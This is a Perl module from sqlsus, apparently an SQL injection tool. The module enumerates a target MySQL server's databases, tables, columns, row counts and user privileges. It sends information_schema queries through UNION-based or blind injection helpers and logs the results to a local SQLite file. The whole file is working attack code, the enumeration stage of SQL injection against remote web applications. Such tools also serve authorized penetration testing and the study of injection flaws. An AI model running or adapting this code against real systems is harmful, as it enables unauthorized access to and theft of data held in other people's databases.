package get;

# This file is part of sqlsus
#
# Copyright (c) 2008,2009 sativouf
# http://sqlsus.sf.net/
#
# Licensed under the GPL version 2.0 license.
# See LICENSE file or
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html

use strict;
use warnings;

##################################
sub get_databases {
	print STDERR "[+] Getting databases names\n";
	my ($status, @result) = &select::mass_query("SELECT schema_name FROM information_schema.schemata WHERE schema_name != \"information_schema\"", 1);
	if ($status) {
		for my $db (@result) {
			if (not &db::query("SELECT * FROM databases WHERE database_name = ?", $db)) {
				&db::query("INSERT INTO databases VALUES (?,?,?,?)", $db, '','','');
			}
		}
	}
	return $status; 
}


################################## 
sub get_user_privileges {
	print STDERR "[+] Getting user privileges\n";
	my $fill = 0;
	if (not $main::target{user}) { 
		print STDERR "Error : current user not defined, use \"start\" first\n";
		return 0;
	}
	# user privs
	my ($status, @result) = &select::mass_query("SELECT privilege_type FROM $conf::tables{user_privs} WHERE grantee = \"$main::target{user}\"", 1);
	if ($status > 0) { 
		&db::query("DELETE FROM privileges WHERE grantee = ?", $main::target{user});
		for my $priv (@result) {
			&db::query("INSERT INTO privileges VALUES (?,?)", $main::target{user}, $priv);
		}
	}
	return $status;
}

##################################
sub get_tables {
	print STDERR "[+] Getting tables names\n";
	if (not $main::database) {
		print STDERR "Error : current database not defined, use \"start\" first\n";
		return 0;
	}
	my ($status, @result) = &select::mass_query("SELECT table_name FROM $conf::tables{tables} WHERE table_schema = BINARY \"$main::database\"", 1);
	&db::query("DELETE FROM databases WHERE database_name = ? AND table_name = '' AND column_name = ''", $main::database);
	if ($status > 0) {
		my $dbh = DBI->connect("dbi:SQLite:dbname=$main::logdb","","",{AutoCommit => 0});
		my $sth = $dbh->prepare("INSERT INTO databases VALUES (?, ?, ?, ?)");
		for my $table (@result) {
			next if &db::query("SELECT * FROM databases WHERE database_name = ? and table_name = ?", $main::database, $table);
			$sth->execute($main::database, $table, '', '');
		}
		$dbh->commit();
	} 
	return $status;
}   

##################################
sub get_count {
	my $table = shift;
		
	print STDERR "[+] Getting count(*)\n";
	if (not $main::database) {
		print STDERR "Error : current database not defined, use \"start\" first\n";
		return 0;
	}
	my @tables = &db::query("SELECT DISTINCT table_name FROM databases WHERE database_name = ? AND table_name != ''", $main::database);
	if (not $table and not @tables) {
		print STDERR "Error : get tables first\n";
		return 0;
	}

	if ($table) { 
		my ($status, @result) = &select::query("SELECT count(*) FROM $main::database.$table", 1);
		if ($status) {
			my $count = join ('', @result);
			if (&db::query("SELECT * FROM databases WHERE database_name = ? AND table_name = ?", $main::database, $table)) {
				&db::query("UPDATE databases SET count = ? WHERE database_name = ? AND table_name = ?", $count, $main::database, $table);
			} else {
				&db::query("INSERT INTO databases VALUES (?, ?, ?, ?)", $main::database, $table, '', $count);
			}
		}
	} else {
		my @queries;
		my ($status, @result, @results);
		my $min_len = length($conf::url_start) + length($conf::url_end) + 1;
		for my $table (@tables) {
			if ($min_len + length(join '', @queries) + length ("SELECT count(*) FROM $main::database.$table") > $conf::max_sendable) {
				($status, @result) = &select::query("SELECT (" . join ("),(",@queries) . ")", 1);
				push @results, @result;
				@queries = ();
			}
			push @queries, "SELECT count(*) FROM $main::database.$table";
		}
		($status, @result) = &select::query("SELECT (" . join ("),(",@queries) . ")", 1);
		push @results, @result;

		my $dbh = DBI->connect("dbi:SQLite:dbname=$main::logdb","","",{AutoCommit => 0});
		my $sth = $dbh->prepare("UPDATE databases SET count = ? WHERE database_name = ? AND table_name = ?");
		
		for my $table (@tables) {
			my $count = shift @results;
			$sth->execute($count, $main::database, $table);
		}
		$dbh->commit();
	}
	return 1;
}

##################################
sub get_columns {
	my $table = shift;

	my ($status, @result) ;

	print STDERR "[+] Getting columns names\n";
	if (not $main::database) {
		print STDERR "Error : current database not defined, use \"start\" first\n";
		return 0;
	}
	my @tables;
	if ($table) {
		push @tables, $table;
	} else {
		push @tables, &db::query("SELECT DISTINCT table_name FROM databases WHERE database_name = ? AND table_name != ''", $main::database);
	}
	if ((@tables and $conf::blind) or scalar @tables == 1) {
		for my $table (@tables) {
			($status, my @col_result) = &select::mass_query("SELECT column_name FROM $conf::tables{columns} WHERE table_schema = BINARY \"$main::database\" and table_name = BINARY \"$table\"", 1);
			if ($status) {
				for my $col (@col_result) {
					push @result, $table;
					push @result, $col;
				}
			}
		}
	} else {
		# Allow get columns as an alias to get tables + get columns, since we are using this SELECT anyway...
		($status, @result) = &select::mass_query("SELECT table_name, column_name FROM $conf::tables{columns} WHERE table_schema = \"$main::database\"", 1);
	}
	if ($status) {
		my $dbh = DBI->connect("dbi:SQLite:dbname=$main::logdb","","",{AutoCommit => 0});
        my $sth_d = $dbh->prepare("DELETE FROM databases WHERE database_name = ? AND table_name = ?");
        my $sth_i = $dbh->prepare("INSERT INTO databases VALUES (?, ?, ?, ?)");

		my @processed_tables = ();
		while (my $table = shift @result) {
			my $column = shift @result;

			my ($count) = &db::query("SELECT count FROM databases WHERE database_name = ? AND table_name = ?", $main::database, $table);
			$sth_d->execute($main::database, $table) unless grep { $_ eq $table } @processed_tables;
			$sth_i->execute($main::database, $table, $column, $count);
			push @processed_tables, $table;
		}
		$dbh->commit;
	}
	return $status;
} 

##################################
sub usage {
	print <<EOF;
Usage : get item

This command retrieves information from MySQL system tables (information_schema.*).
Note that it will only work on MySQL >= 5

Possible items :
tables               : get the names of the tables
columns [table_name] : get the names of the columns [for the specific table]
count                : get the count(*) for each table
db                   : same as get tables + columns + count
privs                : get the privileges for the user
databases            : get the names of all the databases
EOF
}

##################################
sub command {
	my $args = shift;
	my $ret = 0;

	if ($args !~ /(databases|priv(ilege)?s|(tables|db)|(?:columns ?(.*)|db)|(?:count ?(.*)|db))$/ ) {
		&usage;
		return 0;
	}

    if (not $conf::blind and not @conf::columns) {
        print STDERR "Error : columns for UNION not set, set them in the configuration file or use \"start\" first\n";
        return 0;
    }

	last if $main::interrupt;
	if ($args =~ /^databases$/)    			{ $ret += &get_databases() }
	last if $main::interrupt;
	if ($args =~ /^priv(ilege)?s$/) 		{ $ret += &get_user_privileges() } 
	last if $main::interrupt;
	if ($args =~ /^(tables|db)$/)       	{ $ret += &get_tables() } 
	last if $main::interrupt;	
	if ($args =~ /^(?:columns ?(.*)|db)$/) 	{ $ret += &get_columns($1) }
	last if $main::interrupt;
	if ($args =~ /^(?:count ?(.*)|db)$/)        	{ $ret += &get_count($1) }
	last if $main::interrupt;
	
	if ($ret) { 
		if ($args =~ /^(tables|columns|count.*|db)$/) {
			&show::command("db");
		} else {
			&show::command($args) 
		}
	} else {
		print STDERR "Query failed. SQL error ?\n";
	}

	if 	($args =~ /^db$/i) { return ($ret == 3) }
	return $ret;
}

1
